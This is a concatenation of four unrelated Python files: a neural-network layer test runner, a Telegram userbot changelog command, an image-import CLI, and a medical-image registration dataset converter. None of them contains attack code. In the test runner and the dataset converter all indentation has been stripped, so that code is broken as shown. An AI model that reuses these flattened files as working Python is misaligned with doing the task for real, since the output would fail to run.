system_dict = test_layer_global_average_pooling3d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_batch_normalization(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_identity(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_fully_connected(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_dropout(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_flatten(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_activation_relu(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_activation_softmax(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_activation_thresholded_relu(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_activation_elu(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_activation_prelu(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_activation_leaky_relu(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_activation_selu(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_activation_softplus(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_activation_softsign(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_activation_tanh(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_activation_sigmoid(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_activation_hard_sigmoid(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_concatenate(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_add(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_initializer_xavier_normal(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_initializer_xavier_uniform(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_initializer_random_normal(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_initializer_random_uniform(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_initializer_lecun_normal(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_initializer_lecun_uniform(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_initializer_he_normal(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_initializer_he_uniform(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_initializer_truncated_normal(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_initializer_orthogonal(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_initializer_variance_scaling(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_resnet_v1(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_resnet_v2(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_resnet_v1_bottleneck(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_resnet_v2_bottleneck(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_resnext(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_mobilenet_v2_linear_bottleneck(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_mobilenet_v2_inverted_linear_bottleneck(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_squeezenet_fire(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_densenet(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_conv_bn_relu(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_inception_a(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_inception_b(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_inception_c(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_inception_d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_inception_e(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
sys.stdout = open("test_logs.txt", 'a');
end = time.time();
print("Total Tests - {}".format(system_dict["total_tests"]));
print("Time Taken - {} sec".format(end-start));
print("Num Successful Tests - {}".format(system_dict["successful_tests"]));
print("Num Failed Tests - {}".format(len(system_dict["failed_tests_lists"])));
print("Num Skipped Tests - {}".format(len(system_dict["skipped_tests_lists"])));
print("");
for i in range(len(system_dict["failed_tests_lists"])):
print("{}. Failed Test:".format(i+1));
print("Name - {}".format(system_dict["failed_tests_lists"][i]));
print("Error - {}".format(system_dict["failed_tests_exceptions"][i]));
print("");
print("Skipped Tests List - {}".format(system_dict["skipped_tests_lists"]));
print("");
sys.stdout = origstdout;
print("Total Tests - {}".format(system_dict["total_tests"]));
print("Time Taken - {} sec".format(end-start));
print("Num Successful Tests - {}".format(system_dict["successful_tests"]));
print("Num Failed Tests - {}".format(len(system_dict["failed_tests_lists"])));
print("Num Skipped Tests - {}".format(len(system_dict["skipped_tests_lists"])));
print("See test_logs.txt for errors");
print("");
os.system("rm -r workspace");
|
python
|
"""
.log to view bot log
For all users
"""
import asyncio
from telethon import events
from telethon.tl.types import ChannelParticipantsAdmins
from uniborg.util import admin_cmd
@borg.on(admin_cmd(pattern="log"))
@borg.on(events.NewMessage(pattern=r"\.log(.*)",incoming=True))
async def _(event):
    if event.fwd_from:
        return
    mentions = """**αℓℓυкα Zᴏʟᴅʏᴄᴋ™** //logs\n\n//8th feb 2020//\n• Fix `.kang` double reply.\n• Added new plugin `. into ur count` To view my stats 😉 **FOR SUDO USER ONLY**\n\n//10th feb 2020//\n• Added `.ai` (Your message) AI chat Bot 😉 [BUT VERY SLOW TO REPLY 😕]\n\n//11th Feb 2020//\n• Added `.slap` in reply to any message, or u gonna slap urself.\n• Added `.rnupload` file.name\n\n//12th feb 2020// \n• Added `.ft` (any emoji)
\n//13 March 2020//\n• Change prefix .ud to .mean \n• Added `.rrgb` Random RGB text Sticker\n• Added `.tagall` to tag all ppl in chat \n• Added `.commit` to upload plugins into ur github repo (SUDO ONLY)
//26 March 2020//
•Added `.decide` to get an answer YES or NO
•Added `.paste` pastebin
•Added `.userlist` to get all users in your chat.
•Added `.setwelcome` set welcome message in your chat.
•Added `.clearwelcome` disable welcome message in your chat.
"""
    chat = await event.get_input_chat()
    async for x in borg.iter_participants(chat, filter=ChannelParticipantsAdmins):
        mentions += f""
    reply_message = None
    if event.reply_to_msg_id:
        reply_message = await event.get_reply_message()
        await reply_message.reply(mentions)
    else:
        await event.reply(mentions)
    await event.delete()
|
python
|
import rigor.importer
import argparse
def main():
    parser = argparse.ArgumentParser(description='Imports images and metadata into the database')
    parser.add_argument('database', help='Database to use')
    parser.add_argument('directories', metavar='dir', nargs='+', help='Directory containing images and metadata to import')
    parser.add_argument('-m', '--move', action="store_true", dest='move', default=False, help='Move files into repository instead of copying')
    args = parser.parse_args()
    for directory in args.directories:
        i = rigor.importer.Importer(directory, args.database, args.move)
        i.run()

if __name__ == '__main__':
    main()
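
# Hedged usage sketch (the script name and directory paths below are
# illustrative, not from the original project): the importer is driven
# entirely from the CLI, e.g.
#
#   python import_images.py my_database ./batch_2020_01 ./batch_2020_02 --move
#
# Each positional directory is handed to rigor.importer.Importer, which copies
# (or, with --move, moves) its images and metadata into the named database.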
|
python
|
"""
this is a transfer tool for existed oai data (train, val , test, debug)
it will crop the image into desired size
include two part
crop the data and save it into new direc ( the code will be based on dataloader)
generate a new directory which should provide the same train,val,test and debug set, but point to the cropped data
"""
from __future__ import print_function, division
import sys
import os
sys.path.insert(0, os.path.abspath('.'))
sys.path.insert(0, os.path.abspath('..'))
sys.path.insert(0, os.path.abspath('../model_pool'))
from easyreg.reg_data_utils import *
from multiprocessing import *
import SimpleITK as sitk
num_of_workers = 12
import progressbar as pb
from easyreg.utils import *
class RegistrationDataset(object):
"""registration dataset."""
def __init__(self, data_path, phase=None, resize_factor=[1., 1., 1.]):
"""
the dataloader for registration task, to avoid frequent disk communication, all pairs are compressed into memory
:param data_path: string, path to the data
the data should be preprocessed and saved into txt
:param phase: string, 'train'/'val'/ 'test'/ 'debug' , debug here means a subset of train data, to check if model is overfitting
:param transform: function, apply transform on data
: seg_option: pars, settings for segmentation task, None for registration task
: reg_option: pars, settings for registration task, None for segmentation task
"""
self.data_path = data_path
self.task_output_path = None
self.data_output_path = None
self.real_img_path = None
self.real_label_path = None
self.running_read_path = None
self.phase = phase
self.data_type = '*.nii.gz'
self.turn_on_pair_regis = False
self.max_num_pair_to_load = [-1, -1, -1, -1]
""" the max number of pairs to be loaded into the memory"""
self.has_label = False
self.shared_label_set = None
self.get_file_list()
self.resize_factor = resize_factor
self.resize = not all([factor == 1 for factor in self.resize_factor])
self.pair_list = []
def process(self):
self.transfer_exist_dataset_txt_into_new_one()
#self.process_img_pool()
def set_task_output_path(self, path):
self.task_output_path = path
os.makedirs(path, exist_ok=True)
def set_data_output_path(self, path):
self.data_output_path = path
os.makedirs(path, exist_ok=True)
def set_real_data_path(self, img_path, label_path):
self.real_img_path = img_path
self.real_label_path = label_path
def set_running_read_path(self, running_read_path):
self.running_read_path = running_read_path
def set_shared_label(self, shared_label_set):
self.shared_label_set = shared_label_set
def get_file_list(self):
"""
get the all files belonging to data_type from the data_path,
:return: full file path list, file name list
"""
if not os.path.exists(self.data_path):
self.path_list = []
self.name_list = []
return
self.path_list = read_txt_into_list(os.path.join(self.data_path, 'pair_path_list.txt'))
self.name_list = read_txt_into_list(os.path.join(self.data_path, 'pair_name_list.txt'))
if len(self.path_list[0]) == 4:
self.has_label = True
if len(self.name_list) == 0:
self.name_list = ['pair_{}'.format(idx) for idx in range(len(self.path_list))]
if self.phase == 'test':
self.path_list = [[pth.replace('zhenlinx/Data/OAI_segmentation', 'zyshen/oai_data') for pth in pths] for
pths in
self.path_list]
def transfer_exist_dataset_txt_into_new_one(self):
source_path_list, target_path_list, l_source_path_list, l_target_path_list = self.split_file_list()
file_num = len(source_path_list)
assert len(source_path_list) == len(target_path_list)
if l_source_path_list is not None and l_target_path_list is not None:
assert len(source_path_list) == len(l_source_path_list)
file_list = [[source_path_list[i], target_path_list[i], l_source_path_list[i], l_target_path_list[i]] for i
in range(file_num)]
else:
file_list = [[source_path_list[i], target_path_list[i]] for i in range(file_num)]
img_output_path = os.path.join(self.running_read_path, 'img')
label_output_path = os.path.join(self.running_read_path, 'label')
file_list = [[pths[i].replace(self.real_img_path, img_output_path) if i in [0, 1] else pths[i].replace(
self.real_label_path[0],
label_output_path)
for i, pth in enumerate(pths)] for pths in file_list]
if len(self.real_label_path) > 1:
file_list = [[pths[i].replace(self.real_img_path, img_output_path) if i in [0, 1] else pths[i].replace(
self.real_label_path[1],
label_output_path)
for i, pth in enumerate(pths)] for pths in file_list]
output_path = self.task_output_path
pair_txt_path = os.path.join(output_path, 'pair_path_list.txt')
fn_txt_path = os.path.join(output_path, 'pair_name_list.txt')
fname_list = [generate_pair_name([file_list[i][0],file_list[i][1]]) for i in range(file_num)]
write_list_into_txt(pair_txt_path, file_list)
write_list_into_txt(fn_txt_path, fname_list)
def split_file_list(self):
path_list = self.path_list
num_pair = len(path_list)
assert len(path_list[0]) >= 2
has_label = True if len(path_list[0]) == 4 else False
source_path_list = [path_list[i][0] for i in range(num_pair)]
target_path_list = [path_list[i][1] for i in range(num_pair)]
l_source_path_list = None
l_target_path_list = None
if has_label:
l_source_path_list = [path_list[i][2] for i in range(num_pair)]
l_target_path_list = [path_list[i][3] for i in range(num_pair)]
return source_path_list, target_path_list, l_source_path_list, l_target_path_list
def process_img_pool(self):
"""img pool shoudl include following thing:
img_label_path_dic:{img_name:{'img':img_fp,'label':label_fp,...}
img_label_dic: {img_name:{'img':img_np,'label':label_np},......}
pair_name_list:[[pair1_s,pair1_t],[pair2_s,pair2_t],....]
pair_list [[s_np,t_np,sl_np,tl_np],....]
only the pair_list need to be used by get_item method
"""
img_label_path_dic = {}
pair_name_list = []
for fps in self.path_list:
for i in range(2):
fp = fps[i]
fn = get_file_name(fp)
if fn not in img_label_path_dic:
if self.has_label:
img_label_path_dic[fn] = {'img': fps[i], 'label': fps[i + 2]}
else:
img_label_path_dic[fn] = {'img': fps[i]}
pair_name_list.append([get_file_name(fps[0]), get_file_name(fps[1])])
split_dict = self.__split_dict(img_label_path_dic, num_of_workers)
procs = []
for i in range(num_of_workers):
p = Process(target=self.sub_process, args=(split_dict[i],))
p.start()
print("pid:{} start:".format(p.pid))
procs.append(p)
for p in procs:
p.join()
print("completed the processing in {}".format(self.phase))
def sub_process(self, img_label_path_dic):
pbar = pb.ProgressBar(widgets=[pb.Percentage(), pb.Bar(), pb.ETA()], maxval=len(img_label_path_dic)).start()
count = 0
for _, img_label_path in img_label_path_dic.items():
img_pth = img_label_path['img']
label_pth = img_label_path['label']
self.resize_input_img_and_save_it(img_pth, is_label=False, fname=get_file_name(img_pth))
self.resize_input_img_and_save_it(label_pth, is_label=True, fname=get_file_name(label_pth))
count += 1
pbar.update(count)
pbar.finish()
def convert_label_map_into_standard_one(self, label):
label_np = sitk.GetArrayFromImage(label)
cur_label = list(np.unique(label_np))
extra_label = set(cur_label) - self.shared_label_set
# print(" the extra label is {}. ".format(extra_label))
if len(extra_label) == 0:
print("no extra label")
for elm in extra_label:
"""here we assume the value 0 is the background"""
label_np[label_np == elm] = 0
label = sitk.GetImageFromArray(label_np)
return label
def resize_input_img_and_save_it(self, img_pth, is_label=False, fname='', keep_physical=True):
"""
:param img: sitk input, factor is the outputsize/patched_sized
:return:
"""
img_org = sitk.ReadImage(img_pth)
img = self.__read_and_clean_itk_info(img_pth)
if is_label and self.shared_label_set is not None:
img = self.convert_label_map_into_standard_one(img)
dimension = 3
factor = np.flipud(self.resize_factor)
img_sz = img.GetSize()
if self.resize:
resampler = sitk.ResampleImageFilter()
affine = sitk.AffineTransform(dimension)
matrix = np.array(affine.GetMatrix()).reshape((dimension, dimension))
after_size = [int(img_sz[i] * factor[i]) for i in range(dimension)]
after_size = [int(sz) for sz in after_size]
matrix[0, 0] = 1. / factor[0]
matrix[1, 1] = 1. / factor[1]
matrix[2, 2] = 1. / factor[2]
affine.SetMatrix(matrix.ravel())
resampler.SetSize(after_size)
resampler.SetTransform(affine)
if is_label:
resampler.SetInterpolator(sitk.sitkNearestNeighbor)
else:
resampler.SetInterpolator(sitk.sitkBSpline)
img_resampled = resampler.Execute(img)
else:
img_resampled = img
output_path = self.data_output_path
output_path = os.path.join(output_path, 'img') if not is_label else os.path.join(output_path, 'label')
os.makedirs(output_path, exist_ok=True)
fpth = os.path.join(output_path, fname + '.nii.gz')
if keep_physical:
img_resampled.SetSpacing(resize_spacing(img_sz, img_org.GetSpacing(), factor))
img_resampled.SetOrigin(img_org.GetOrigin())
img_resampled.SetDirection(img_org.GetDirection())
sitk.WriteImage(img_resampled, fpth)
return fpth
def __read_and_clean_itk_info(self, path):
if path is not None:
return sitk.GetImageFromArray(sitk.GetArrayFromImage(sitk.ReadImage(path)))
else:
return None
def __split_dict(self, dict_to_split, split_num):
index_list = list(range(len(dict_to_split)))
index_split = np.array_split(np.array(index_list), num_of_workers)
split_dict = []
dict_to_split_items = list(dict_to_split.items())
for i in range(split_num):
dj = dict(dict_to_split_items[index_split[i][0]:index_split[i][-1] + 1])
split_dict.append(dj)
return split_dict
def __inverse_name(self, name):
try:
n_parts = name.split('_image_')
inverse_name = n_parts[1] + '_' + n_parts[0] + '_image'
return inverse_name
except:
n_parts = name.split('_brain_')
inverse_name = n_parts[1] + '_' + n_parts[0] + '_brain'
return inverse_name
def __len__(self):
return len(self.name_list)
data_path = '/playpen-raid/zyshen/data/reg_debug_labeled_oai_reg_inter'
phase_list = ['test']
""" path for saving the pair_path_list, pair_name_list"""
task_output_path = '/playpen-raid/zyshen/for_llf/reg_debug_labeled_oai_reg_inter'#'/playpen-raid/zyshen/data/croped_for_reg_debug_3000_pair_oai_reg_inter'
""" path for where to read the image during running the tasks"""
running_read_path = '/pine/scr/z/y/zyshen/reg_debug_labeled_oai_reg_inter/data'#'/playpen-raid/zyshen/data/croped_for_reg_debug_3000_pair_oai_reg_inter'
""" path for where to save the data"""
data_output_path = '/playpen-raid/zyshen/oai_data/reg_debug_labeled_oai_reg_inter/data'
""" img path need to be replaced with running_read_img_path"""
real_img_path = '/playpen-raid/zyshen/oai_data/Nifti_rescaled' #'/playpen-raid/zhenlinx/Data/OAI_segmentation/Nifti_6sets_rescaled'
""" label path need to be replaced with runing_read_label_path """
real_label_path = ['/playpen-raid/zyshen/oai_data/Nifti_rescaled']
#['/playpen-raid/zhenlinx/Data/OAI_segmentation/segmentations/images_6sets_right/Cascaded_2_AC_residual-1-s1_end2end_multi-out_UNet_bias_Nifti_rescaled_train1_patch_128_128_32_batch_2_sample_0.01-0.02_cross_entropy_lr_0.0005_scheduler_multiStep_02262018_013038',
# '/playpen-raid/zhenlinx/Data/OAI_segmentation/segmentations/images_6sets_left/Cascaded_2_AC_residual-1-s1_end2end_multi-out_UNet_bias_Nifti_rescaled_train1_patch_128_128_32_batch_2_sample_0.01-0.02_cross_entropy_lr_0.0005_scheduler_multiStep_02262018_013038']
resize_factor = [1,1,1]#[80./160.,192./384.,192./384]
shared_label_set=None
# data_path = '/playpen-raid/zyshen/data/reg_debug_3000_pair_oai_reg_intra'
# phase_list = ['train','val','debug']
# """ path for saving the pair_path_list, pair_name_list"""
# task_output_path = '/playpen-raid/zyshen/data/reg_debug_3000_pair_oai_reg_intra'
# """ path for where to read the image during running the tasks"""
# running_read_path = '/playpen-raid/zyshen/oai_data/reg_debug_labeled_oai_reg_intra/data'
# """ path for where to save the data"""
# data_output_path = '/playpen-raid/zyshen/oai_data/reg_debug_labeled_oai_reg_intra/data'
# """ img path need to be replaced with running_read_img_path"""
# real_img_path = '/playpen-raid/zhenlinx/Data/OAI_segmentation/Nifti_6sets_rescaled'
# """ label path need to be replaced with runing_read_label_path """
# real_label_path = ['/playpen-raid/zhenlinx/Data/OAI_segmentation/segmentations/images_6sets_right/Cascaded_2_AC_residual-1-s1_end2end_multi-out_UNet_bias_Nifti_rescaled_train1_patch_128_128_32_batch_2_sample_0.01-0.02_cross_entropy_lr_0.0005_scheduler_multiStep_02262018_013038',
# '/playpen-raid/zhenlinx/Data/OAI_segmentation/segmentations/images_6sets_left/Cascaded_2_AC_residual-1-s1_end2end_multi-out_UNet_bias_Nifti_rescaled_train1_patch_128_128_32_batch_2_sample_0.01-0.02_cross_entropy_lr_0.0005_scheduler_multiStep_02262018_013038']
# resize_factor = [80./160.,192./384.,192./384]
# shared_label_set=None
# data_path = '/playpen-raid1/zyshen/data/reg_oai_aug'
# phase_list = ['train','val','debug','teset']
# """ path for saving the pair_path_list, pair_name_list"""
# task_output_path = '/playpen-raid1/zyshen/data/reg_oai_aug'
# """ path for where to read the image during running the tasks"""
# running_read_path = '/playpen-raid/zyshen/data/croped_for_reg_debug_3000_pair_oai_reg_intra'
# """ path for where to save the data"""
# data_output_path = '/playpen-raid/zyshen/oai_data/reg_debug_labeled_oai_reg_intra/data'
# """ img path need to be replaced with running_read_img_path"""
# real_img_path = '/playpen-raid/zyshen/oai_data/Nifti_rescaled'#'/playpen-raid/zhenlinx/Data/OAI_segmentation/Nifti_6sets_rescaled'
# """ label path need to be replaced with runing_read_label_path """
# real_label_path = ['/playpen-raid/zyshen/oai_data/Nifti_rescaled']
# #['/playpen-raid/zhenlinx/Data/OAI_segmentation/segmentations/images_6sets_right/Cascaded_2_AC_residual-1-s1_end2end_multi-out_UNet_bias_Nifti_rescaled_train1_patch_128_128_32_batch_2_sample_0.01-0.02_cross_entropy_lr_0.0005_scheduler_multiStep_02262018_013038',
# # '/playpen-raid/zhenlinx/Data/OAI_segmentation/segmentations/images_6sets_left/Cascaded_2_AC_residual-1-s1_end2end_multi-out_UNet_bias_Nifti_rescaled_train1_patch_128_128_32_batch_2_sample_0.01-0.02_cross_entropy_lr_0.0005_scheduler_multiStep_02262018_013038']
# resize_factor = [80./160.,192./384.,192./384]
# shared_label_set=None
#
# data_path = '/playpen-raid/zyshen/data/reg_debug_3000_pair_reg_224_oasis3_reg_inter'
# phase_list = ['train','val','debug','test']
# """ path for saving the pair_path_list, pair_name_list"""
# task_output_path = '/playpen-raid/zyshen/data/croped_lfix_for_reg_debug_3000_pair_reg_224_oasis3_reg_inter'#'/playpen-raid/zyshen/data/croped_for_reg_debug_3000_pair_oai_reg_inter'
# """ path for where to read the image during running the tasks"""
# running_read_path = '/playpen-raid/zyshen/oasis_data/croped_lfix_for_reg_debug_3000_pair_reg_224_oasis3_reg_inter/data'
# #'/pine/scr/z/y/zyshen/croped_for_reg_debug_3000_pair_oai_reg_inter/data'#'/playpen-raid/zyshen/data/croped_for_reg_debug_3000_pair_oai_reg_inter'
# """ path for where to save the data"""
# data_output_path = '/playpen-raid/zyshen/oasis_data/todel/data'
# """ img path need to be replaced with running_read_img_path"""
# real_img_path = '/playpen-raid/xhs400/OASIS_3/processed_images_centered_224_224_224'
# """ label path need to be replaced with runing_read_label_path """
# real_label_path = ['/playpen-raid/xhs400/OASIS_3/processed_images_centered_224_224_224']
# resize_factor = [112./224.,112./224.,112./224]
# """Attention, here we manually add id 62 into list, for it is a big structure and is not absent in val, debug, test dataset"""
# #shared_label_set = {0, 2, 3, 4, 5, 7, 8, 10, 11, 12, 13, 14, 15, 16, 17, 18, 24, 26, 28, 31, 41, 42, 43, 44, 46, 47, 49, 50, 51, 52, 53, 54, 58, 60, 62, 63, 77, 80, 85, 251, 252, 253, 254, 255}
# shared_label_set = {0, 2, 3, 4, 7, 8, 10, 11, 12, 13, 14, 15, 16, 17, 18, 24, 28, 31, 41, 42, 43, 46, 47, 49, 50, 51, 52, 53, 54, 60, 63, 77}
#
# #
#
#
# data_path = '/playpen-raid/zyshen/data/syn_data'
# phase_list = ['test']
# """ path for saving the pair_path_list, pair_name_list"""
# task_output_path = '/playpen-raid/zyshen/for_llf/syn_2d' # '/playpen-raid/zyshen/data/croped_for_reg_debug_3000_pair_oai_reg_inter'
# """ path for where to read the image during running the tasks"""
# running_read_path = '/pine/scr/z/y/zyshen/data/syn_data/syn_2d/data' # '/playpen-raid/zyshen/data/croped_for_reg_debug_3000_pair_oai_reg_inter'
# """ path for where to save the data"""
# data_output_path = '/playpen-raid/zyshen/syn_data/2d_syn/data'
# """ img path need to be replaced with running_read_img_path"""
# real_img_path = '/playpen-raid/zyshen/debugs/syn_expr_0422_2' # '/playpen-raid/zhenlinx/Data/OAI_segmentation/Nifti_6sets_rescaled'
